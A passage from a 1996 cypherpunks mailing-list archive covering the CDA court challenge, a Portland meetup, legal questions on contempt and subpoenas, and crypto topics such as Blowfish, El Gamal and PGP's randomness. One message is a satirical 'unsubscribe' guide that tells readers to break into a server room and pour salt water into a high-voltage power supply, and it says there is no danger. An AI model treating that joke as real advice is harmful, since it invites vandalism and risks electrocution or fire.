found both Playboy centerfolds and "the seven dirty words" patently
offensive. (He'll fit in nicely at his new job. CMU still bans the
alt.binaries.pictures.erotica.* hierarchy from campus computers.)

When asked if a list of URLs looked like a bunch of porn sites, Olsen
hesitated: "I don't know, but I wouldn't go there."
Judge Dalzell interrupted: "The 'Chick of the Day' could be poultry!"
Judge Sloviter said: "Are you sure it isn't a duck?"

In response to Bruce Ennis' question about how ISPs can check the ages
of their users, Olsen replied: "The only people who might have this
would be the Social Security Administration. I'm sure they have that
information."

So Olsen proposes that the _Social Security Administration_ would
control who is allowed to access to the Net?


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
       GREY FLANNEL SUIT SURFS NET FOR PORN, WEARS BLUE PINSTRIPE
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

The DoJ's net.sex expert who testified in the morning was Grey Flannel
Suit -- AKA Howard Schmidt, Special Agent, Director of the Air Force
Office of Special Investigations, Computer Crime Investigations.

Schmidt started surfing the Net to show how easily a child could
stumble across cyberporn. His smooth demonstration was interrupted
when ALA/CIEC attorney Ann Kappler pressed for details and Schmidt
reluctantly allowed that he had run his initial searches without
SurfWatch activated. Schmidt admitted: "SurfWatch would not have
allowed the search." He also had typed in URLs from the paper copy of
Playboy Magazine -- which children are prevented from buying.

Kappler told me over lunch: "He left himself wide open." The judges
seemed to agree.

No matter what our Philly panel decides, this case is headed for the
Supreme Court. Today is the last day of our hearing, followed by
closing arguments on June 3. [As of late 4/15, this has been
rescheduled to 5/10. -DBM] Then the three-judge panel will issue an
opinion by the end of the summer. The losing side will appeal to the
Supreme Court, which returns from summer recess on October 7.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court 4/15 for the last day of the hearing and 5/10 for
closing arguments. The 4/26 date is no longer necessary since we
finished a day early.

Mentioned in this CDA update:

  Carl Kadie's note on how Olsen's plan is unconstitutional
    <http://fight-censorship.dementia.org/fight-censorship/dl?num=2174>
  CDA Update #6, with more details on Dan Olsen's proposal
    <http://fight-censorship.dementia.org/fight-censorship/dl?num=2143>
  Net-Guru David Reed's article: "CDA may pervert Internet architecture"
    <http://fight-censorship.dementia.org/fight-censorship/dl?num=2093>
  Social Security Admin.  <http://www.ssa.gov/>
  Dan Olsen at BYU        <http://www.cs.byu.edu/info/drolsen.html>
  Fight-Censorship list   <http://fight-censorship.dementia.org/top/>
  BYU's censorship policy <http://advance.byu.edu/pc/releases/guidelines.html>
  Rimm ethics critique    <http://www.cs.cmu.edu/~declan/rimm/>
  Int'l Net-Censorship    <http://www.cs.cmu.edu/~declan/zambia/>
  CMU net-censorship      <http://www.cs.cmu.edu/~kcf/censor/>
  University censorship   <http://joc.mit.edu/>
  Grey Flannel Suit       <howardas@aol.com>
  Carl Kadie's CAF site   <http://www.eff.org/CAF/>

This report and previous CDA Updates are available at:
  <http://fight-censorship.dementia.org/top/>
  <http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/>
  <http://www.epic.org/free_speech/censorship/lawsuit/>

To subscribe to the fight-censorship mailing list for future CDA
updates and related net.censorship discussions, send "subscribe" in
the body of a message addressed to:
  fight-censorship-request@andrew.cmu.edu

Other relevant web sites:
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>
  <http://www.ala.org/>

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 16 Apr 1996 15:23:10 +0800
To: pdx-cypherpunks-l@teleport.com
Subject: Portland Cypherpunk Meeting for April
Message-ID: <2.2.32.19960416035657.00ab813c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There will be another physical meeting on the Cypherpunks in Portland, OR.

The particulars:

Location:   Powell's Technical Bookstore
            33 NW Park
            Portland, OR 97209
            (Just north of Burnside off of the Park blocks.)

Date:       April 27th, 1996
Time:       5:23pm

Discussions will cover:

** A Portland Remailer

** Various Coding Projects

** Events in the News

** Other Projects related to Crypto (Web sites and Documentation)

** Possible PGP Keysigning (Depends on the response)

** General Discussion Devolving into Chaos

If you have any other topics for discussion, bring them up at the meeting or 
you can e-mail me in advance.

Powell's Technical Book has a good selection of crypto books, so you might 
want to be prepared.  (Do not bring money you cannot afford to spend.  
Powell's has an evil force that seduces people into buying books.)

A PGP keysigning will be held if there are enough interested people.  If you 
are interested in participating, please send me your public key via e-mail.

Any comments, suggestions, ideas, and/or complains can be sent to me at 
alano@teleport.com.
 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMXMZZeQCP3v30CeZAQG0/Af/To2q0fuLk8Q6KquP+6LX1/1EOqGGoxBZ
jWfCJoz40Wk1EHMJMis+XpiPgcXg2nAZNeQXubS4Q9se8uGG57UbzpX8rv5GnzdV
HWimufNeL/bfxSn+OYswTEQExSwG2V/TSWZNwfFf5Xl/6V0zy1Xa5qY8CEtXn1fr
3/vXicYexd3NwSvToN5udYYtUe2kH14O3RIoXAnaJwMZLvS+oiDzw8LWXI7UMdsf
akUbhisfgf/lu3wiMVQkN2hdP15rioIlAhryA0skvl1fxh3OkFC8/GDJpRBRWD+K
RjO5VgRRXYrQUG4PKAK8Y1/PSINzandOkaMc2duaSshslZYyI3YRmg==
=zD1a
-----END PGP SIGNATURE-----
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Tue, 16 Apr 1996 14:26:43 +0800
To: cypherpunks@toad.com
Subject: UNSUVSCRIVE Broken - Film last week
Message-ID: <199604160218.VAA23341@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

I have found the crack to the, until now, unbreakable and frustrating 
unsuvscrive algorithm on another list.

This is what you need to do.  Please read these instructions carefully
before beginning.

tools needed: one Hammer, one screwdriver, one pair of pliers, one
heavy-duty pair of wire cutters, one bucket of saline water, a box of
sani-wipes.


Step #1:        Stop payment on any checks that you may have sent to 
your Internet Service Provider (GOD).

Step #2: If GOD is unresponsive and you are still receiving mail from 
this list, you will need to find the "mailhost".  This is a machine 
usually located in a locked office.  Every day around noon, the mailman 
will deliver a box of diskettes with that day's mail messages, 
including yours from this list, to this machine.  Typically, only a 
handful of people have keys to the "mailhost".  The reason why this 
machine is locked up is because this is typically the best, fastest, 
most powerful computer at your facility and the people with keys don't 
want to share it.  If you must, break or pry the door down with one (1) 
hammer (you did get all the tools needed?).

Step #3: find the ON/OFF switch for this machine.  Using the pliers, 
set the switch to the OFF position by tugging downwards until the 
disposable plastic switch breaks away from the computer casing.  
Discard the disposable plastic switch in an environmental-friendly 
manner.  This will alert the mailman to not deliver the diskettes with 
the messages to the "mailhost" not unlike the little red flag found on 
mailboxes.  This should resolve your mail problem immediately.

Step #4:        You may experience a recurrence of mail within 72 
hours.  If this should happen, you will need to disable the "mailhost" 
once again with more forceful measures.  Repeat Step #2.  Don't be 
surprised if there is a sturdier door in place than the one you 
destroyed previously.  This is due to the fact that the "Have Key" 
clique found out that someone has seen their private stash of computer 
equipment.

Step #5:        After you have once again regained entry into the
"mailhost" room, open up the back of the "mailhost".  There may be a
large tv-like device on top of the "mailhost"  You will need to remove
this first.  Take your wire cutters, and cut any cables binding the
tv-like device to the "mailhost".  Set the tv-like device to the side.
With your screwdriver, remove each and every screw that you can find on
the "mailhost".  Once this is done, the "mailhost" should break away 
into two or more pieces.

Step #5: Find a large box with a fan attached to it.  It will be 
clearly marked with the following labels: "Danger" "High Voltage" "Do 
not open - no user-servicable parts".  Don't worry, these labels are 
merely in place to satisfy OSHA requirements and you are not in any 
danger at all.  Take the bucket of saline water and pour it into any 
vents or ports that the large box may have.  Any extra water should be 
poured directly into the computer chassis, be sure to properly soak 
each and every component.

Step #6:        In the event of fire (OSHA has been known to be right 
on occasion), douse any flames with the sani-wipes.

This solution is provided without warranty.  It is not biodegradable 
or fat-free.  In the event of sudden death, contact a physician 
immediately.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMXMDQRKvccEAmlQ9AQHEywf9F42LWdhmmhg9RtTicWnQW26rAYD2koPk
DKoM4r8yIEtVvZfxsdzNQRovpcmC4k2SWkwIb/yu1obVr9y2vC6y25PkxYOppeiA
PXjfnAfLE3eBzhfEjLiFdEmCAlsMrJKDdH7LhOtx4r/hbH4OsJmTVuu87sZ+lNJ0
tBSpOae9cfW/4B6Iny3NmTVCWU0RrrGPrie6gzyC95h6kKIJ7JXBQ0Ux11UWVtYW
Ef/CYE3jUo/lnlYrTWeTtUSf1Zd9aJzvETYKAqr+EK8HXH0eKECsol5QYR+7atvk
XhacowMgdTwVdlait2hXhejR2qGccVr52DqWuTpF1d1ctW7xeSjGxA==
=kF21
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 16 Apr 1996 15:49:53 +0800
To: cypherpunks@toad.com
Subject: Re: Just wondering...
Message-ID: <v02120d65ad98c5937a3a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Posted-Date: Mon, 15 Apr 1996 17:54:06 -0400
Date: Mon, 15 Apr 1996 17:54:06 -0400 (EDT)
From: Black Unicorn <unicorn@schloss.li>
X-Sender: unicorn@polaris.mindport.net
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Just wondering...
MIME-Version: 1.0

On Mon, 15 Apr 1996, Lucky Green wrote:

> Uni,
> Just from past experience: if the judge realizes after putting you into the
> slammer for a month and levying a $10k fine for contempt that you don't
> have the information he is trying to coerce out of you, do you usually get
> your money back? What about income lost while incarcerated?

The former I have seen happen, the latter never.  In the former case a
tax document was "lost" by the witness's accountant who was in Moldavia
and could not be located.  The judge, reasonably, thought the witness
was full of it.  He imposed a per day fine, and after a time
incarcerated the witness before the accountant was (finally) located and
testified (by long distance telephone and intrepreter) that the
documents have been lost in a fire at the national administration
building, proof of which was entered in the form of newpaper articles.
A motion to quash the fine was granted.  The court apologized for the
incarceration.  Fines that are large and seem reasonable in the heat of
court are more likely to get quashed when a judge who wasn't there later
reviews it.  Still, this is rare.

As to the latter, that doesn't mean it won't, but seems unlikely.  You
don't usually get paid for the time you lose in court either, unless you
sue for wrongful prosecution or costs which require malicious and
wrongful prosecution.  (Unlikely, extremely hard to prove or get a court
to enforce).  Pay your own costs tends to include opportunity cost of
time in court.

> TIA,
>
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.

Feel free to repost this to the list.  I don't forward private mail
without explicit permission, but I think the list, and Mr. Finney might
like to see it.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com

--- end forwarded text


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 16 Apr 1996 11:00:16 +0800
To: sameer@c2.org
Subject: Re: on corporations and subpoenas
Message-ID: <199604152212.PAA29987@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from sameer@c2.org 04/15/96 11:00am -0700


= To: cypherpunks@toad.com
= Date: Mon, 15 Apr 1996 11:00:19 -0700 (PDT)
= 
= 	Suppose a corporation has multiple subsidiaries.
= 
= 	Would a subpoena served on the parent corp be binding on the
= subsidiaries?
= 
	yes, but not the other way around. (shit flows downhill!)  
    However, that's on face value also as a judge can order a parent 
    corporation (and its assets) to be subject to the order granted 
    against the subsidiary --e.g. the same principle would be sustained 
    until appeal --in other words, produce the "evidence" to convict 
    yourself and argue about it on appeal.  

	If that does not work, they will go for conspiracy charges, 
    which generally carry the same penalty as commiting the crime!

= 	Or would the better way to handle this be to create spinoff
= corporations rather than subsidiaries?
= 
	depends. if it is collection of S-corps, they are all lumped 
    together for tax purposes and the Fed goes right past the corporate 
    veil.  If they are C-corps, the Fed ignores the fine line print on 
    corporate protection, etc.

	secondly, prosecuters have a tendency to subpoena *individuals* 
    to produce records --easy to identify in small businesses, 
    subsidiary or "clustered."  Even so, they can effectively take the 
    shotgun approach by naming the individual --i.e. whether the target 
    has the files at home, or company A-Z, it does not matter:  produce 
    'em.  I don't know about today, but 20 years ago I told them rather 
    obscenely which part of the anatomy they could use for their head 
    (and the horse they rode in on).

	WARNING: I am not licensed to practice law in the State of 
	California, so take it for what it's worth.


-- 
 Obscenity  is a crutch  for inarticulate motherfuckers.
 Fuck the CDA!

cc: Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: K00l Secrets <secret@secret.alias.net>
Date: Tue, 16 Apr 1996 14:59:27 +0800
To: cypherpunks@toad.com
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <199604141422.KAA05302@jekyll.piermont.com>
Message-ID: <199604160315.WAA15829@paulsdesk.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.LNX.3.92.960414121820.358A-100000@gak> "Mark M." <markm@voicenet.com> writes:

> I haven't heard of any efficient cryptanalysis against Blowfish.  I
> know there are weak keys, but they are difficult to exploit.  16
> round Blowfish can be broken using differential cryptanalysis with
> 2^128+1 chosen plaintexts.

Doesn't this assume known S-boxes, though?  If so, since the S-boxes
are key dependent, is this anything to worry about?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 16 Apr 1996 16:07:08 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: CDA Court Challenge: Update #7 (Ducks on the Net)
In-Reply-To: <MlQivta00YUuQxjmpq@andrew.cmu.edu>
Message-ID: <Pine.SOL.3.91.960415222001.679A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Dash it Declan, I spent a hard day up to my eyeballs in ASN.1. When I 
get home I want something cute to look at. Where are the darn  ducks?

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Apr 1996 20:05:04 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: CDA Court Challenge: Update #7 (Ducks on the Net)
Message-ID: <ad987d0e0002100459cc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 AM 4/16/96, Declan B. McCullagh wrote:

>In this update: Ducks on the Net!
>                More on BYU's Dan Olsen's censorhappy boondoggle
>                Grey Flannel Suit wears Blue Pinstripe, surfs for porn


????

Apparently "The Netly News" has given up on simple, straightforward
reporting in favor of "Pop Journalism." Cute headlines instead of
informative ones.

(The reason I no longer try to wade through the cuteness of "Wired,"
another example of postmodernism carried too far.)

Curmudgeonly Yours,

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 16 Apr 1996 15:09:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Yadda Yadda Yadda] Re: What can the judge do to me?
In-Reply-To: <m0u90Yb-00090RC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960415230235.7936G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 15 Apr 1996, jim bell wrote:

As I predicted, Mr. Bell attributes positions to me I never took.

> At 07:51 PM 4/15/96 -0400, Black Unicorn wrote:

> take the different position that ALL fines are ultimately "punitive"?  That 
> position is apparently not _excluded_ by the constituion, which means that 
  ^^^^^^^^
> at best, you might try to argue that your position is _allowed_ by the 
                                       ^^^^^^^^^^^^^
> constitution.

Woah, nice transition.  "That position" suddenly becomes "my position."  
Tell me, what is my position?  I never expressed an opinion.

> >A contempt fine is
> >considered civil and remedial if it either coerces a defendant into 
> >compliance with a court order 
> 
> You do love those circular arguments, don't you!
  ^^^                                         ^^^
The above is the argument of the court, not my argument.  I never 
expressed an opinion on the argument.

> Hint:  If the position you support is true, then you should be able to show 
            ^^^^^^^^^^^^^^^^^^^^^^^^
> Is that a satisfactory justication for your position?
                                         ^^^^^^^^^^^^^
What was my position again?

> Apparently, it wasn't really necessary, and thus, any justifications based 
> on the claim that it was necessary were dishonest.  As are your 
                                                             ^^^^
> justifications today, on a somewhat different issue.
  ^^^^^^^^^^^^^^

My justifications?  Where?

> 
> I've long pointed out that your own arguments self-destruct, and perhaps 
                             ^^^^^^^^^^^^^^^^^^    
I'm making none here.

> >By 'wrong' you mean doesn't agree with you.  I'm sure precident and it's 
> >rationale means little to you.

> That's spelled "precedent."  But why am I telling you this?

Because English is my third (or fourth depending on how you count them) 
language and I don't bother with spell checkers?  How well do you spell in 
German, Alemanish or Estonian?

As always, I never expressed opinions on the courts view.  You asked for 
justifications, I gave you the court's.  I've not commented on my own 
view.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Felix <Robin.Felix@felixpc.delfinsd.delfin.com>
Date: Tue, 16 Apr 1996 17:55:46 +0800
To: "'cypherpunks@toad.com>
Subject: RE: math patents
Message-ID: <01BB2B22.63457780@delfinsd-gw.delfinsd>
MIME-Version: 1.0
Content-Type: text/plain


At 04/14/96 1457, jim bell may have written:
>At 09:08 AM 4/14/96 -0800, Lee Tien wrote:
>>My recollection from law
>>school is that the law was friendly to math patents in the period before
>>the Supreme Court weighed in.  There were some PTO denials, which courts
>>reversed (I think the Court of Claims heard these back then).  So I think
>>the trend was toward patenting processes even if mathematical until
>>Gottschalk v. Benson

>I seem to recall reading that one of the breakthrough "algorithm" patents
>was from the 1970's, in which a rubber-curing/molding process's cure time 
>was determined by a mathematical formula based on heat, pressure, mold 
>shape, and a number of other variables.

You're referring to Diamond v. Diehr, 450 U.S. 175, 195 (1981).  I have a half-finished article I wrote in 1994 on software algorithm patents, about 32K, available at <http://www.delfinsd.delfin.com/felix/Algorithm_Patents.htm>.  It's the good part, the background material minus footnotes.  Although it's a bit dated, the description of foundational cases is still accurate.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Apr 1996 21:03:41 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <ad987fec02021004063f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 PM 4/15/96, Wei Dai wrote:
>On Thu, 11 Apr 1996, Timothy C. May wrote:
>
>> That there can be no simple definition of entropy, or randomness, for an
>> arbitrary set of things, is essentially equivalent to Godel's Theorem.
>
>I think what you mean is that there is no simple way to measure
>randomness.  Simple, nice definitions of randomness do exist.  Actually

Well, I don't view any of the "simple definitions" of randomness as
especially useful; that is, the simple definitions have a kind of
circularity (implicit in the points we both make). For example, "an object
is "random" if it has no shorter description than itself," the classic
Solomonoff-Kolmogorov-Chaitin definition, is quite elegant, but doesn't
help much in many cases. Because even this definition needs to be fleshed
out, thought about, pondered, and explored, this is why I said "there can
be no simple definition of entropy, or randomness, for an arbitrary set of
things."

Maybe you would say a simple definition does exist, but that interpreting
that definition and applying it to a set of things is harder....a
difference, I think, of emphasis. I hold that in looking at some object
(set, sequence, string, etc.) and asking "Is it random?," the very question
is misleading. It may _appear_ to be random to me, or to a particular
machine which is unable to find a compression (= shorter description,
implying nonrandomness), but someone else or some other program may find
the compression.


>> (To forestall charges that I am relying on an all-too-common form of
>> bullshitting, by referring to Godel, what I mean is that "randomness" is
>> best defined in terms of algorithmic information theory, a la Kolmogorov
>> and Chaitin, and explored in Li and Vitanyi's excellent textbook,
>> "Algorithmic Information Theory and its Applications.")
>
>A year ago, you recommended me a book by the same authors titled _An
>Introduction to Kolmogorov Complexity and Its Applications_.  Have the
>authors written a new book, or are these the same?

The same book. I rely on carbon-based memory.

By the way, Greg Chaitin has a new version of his "Universal Turing
Machine" system implemented in JavaScript. At:

http://www.research.ibm.com/people/c/chaitin/nv/index.html

(Here I rely on non-carbon-based cut-and-paste.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 16 Apr 1996 21:32:17 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What can the judge do to me?
Message-ID: <199604160641.XAA16500@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:51 PM 4/15/96 -0400, Black Unicorn wrote:
>Even contracts are in the end enforced by government in the United States.

The fact the illegal contracts can't be enforced is responsible for most
"drug" violence.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watson@tds.com
Date: Tue, 16 Apr 1996 18:20:26 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: Article on PGP flaws
In-Reply-To: <199604152026.QAA31962@nrk.com>
Message-ID: <Pine.SOL.3.91.960415234347.5127B-100000@mailman.tds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, David Lesher wrote:

> I'm told a periodical:
> 	Crypto & Security
> 	Vol 15 #1
> has an article: 
> 	Probabilistic [sp] Flaws in PGP {aprox title}
> 	by Thierry Moreau
> 
> Has anyone seen/commented on it?
...
Actually it's Computers and Security.  Complains about the PRNG.  Says if 
someone gets your randseed.bin they can infer the PRNG output sequence 
and your IDEA key.  Doesn't develop in any detail.  Says the IDEA key 
should be chosen from _truly_ random numbers.

And this is an expensive magazine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 16 Apr 1996 21:46:40 +0800
To: K00l Secrets <cypherpunks@toad.com
Subject: Re: None
Message-ID: <2.2.32.19960416070406.00a8a95c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:15 AM 4/16/96 -0500, K00l Secrets wrote:
>> If the Diffie-Hellmann patent covers all kind of public key crypto,
>> you need a license from Cylink, i.e. BSAFE is not enough, and if it
>> doesn't you can use El Gamal without a license.
>
>Are there any freely available implementations of El Gamal?

>From what I remember, RSA had made various legal threats to anyone using El
Gamal.  (They claimed it was covered under their patents.)  Since the
Cylink/PKP blowup, I am not certain of the status of this algorithm.

Does anyone have more information on the current status of El Gamal?
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: K00l Secrets <secret@secret.alias.net>
Date: Tue, 16 Apr 1996 17:21:59 +0800
To: cypherpunks@toad.com
Subject: None
Message-ID: <199604160615.BAA16813@paulsdesk.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


> If the Diffie-Hellmann patent covers all kind of public key crypto,
> you need a license from Cylink, i.e. BSAFE is not enough, and if it
> doesn't you can use El Gamal without a license.

Are there any freely available implementations of El Gamal?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Tue, 16 Apr 1996 14:45:46 +0800
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Trojan Horse Loose On The Internet
In-Reply-To: <doug-9603151349.AA0273400@netman.eng.auburn.edu>
Message-ID: <Pine.3.89.9604160236.A21102-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 15 Apr 1996, Doug Hughes wrote:

> >Virus Alert:  PKZIP 3.0 Trojan Loose on the Internet

	Please don't confuse a trojan horse with a virus. 

> 100% true and verifiable. Although I wouldn't call it deadly or rampant, 
> it has been making the rounds of late. Mostly it's victims are new users.

	Isn't this trojan << PKZip 3.0 >>  about 4 years old?

> After all, how many times have you upgraded your copy of pkzip? ;)

	10 times.  << Went thru the 204 alphabet of bug fixes.  :-(    >>

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Tue, 16 Apr 1996 18:18:06 +0800
To: Mark Cooke <mpc@star.sr.bham.ac.uk>
Subject: Re: Distributed Key Breaking
In-Reply-To: <Pine.SOL.3.91.960415151333.14114J-100000@xun9>
Message-ID: <Pine.3.89.9604160251.A21102-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain



	Mark:

On Mon, 15 Apr 1996, Mark Cooke wrote:

> anyone considered writing a Java Applet that would could run key space 
> searches and factoring in an easily distributed manner.

	Interesting idea.

> This would seem to be a 'reasonable' way to gain access to more CPU power 

	And a "reasonable" way to get people who aren't interested in
	helping to break keys, by doing so ---- every time somebody 
	hits your webpage, they get held up for, say 3 minutes, to do
	a little keybreaking of their own.  

        xan

        jonathon
        grafolog@netcom.com




**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 16 Apr 1996 18:30:43 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: What can the judge do to me?
In-Reply-To: <199604160641.XAA16500@netcom9.netcom.com>
Message-ID: <Pine.SUN.3.91.960416024611.15421A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, Bill Frantz wrote:

> At  7:51 PM 4/15/96 -0400, Black Unicorn wrote:
> >Even contracts are in the end enforced by government in the United States.
> 
> The fact the illegal contracts can't be enforced is responsible for most
> "drug" violence.

Hmmm.  Interesting point.  But would admitting you had a contract with 
Fred to smuggle 100 kilos of herion into the United States be a waiver of 
your Fifth Amendment right against self incrimination?  (I think most 
certainly so).

Even if that could be enforced in civil proceedings, it would hardly 
encourage litigants to just come to court instead of shooting themselves.

> ------------------------------------------------------------------------
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 16 Apr 1996 23:55:04 +0800
To: <cypherpunks@toad.com>
Subject: [IRS] Elvis in Escrow
Message-ID: <v03006307ad99344080b5@[192.187.167.52]>
MIME-Version: 1.0
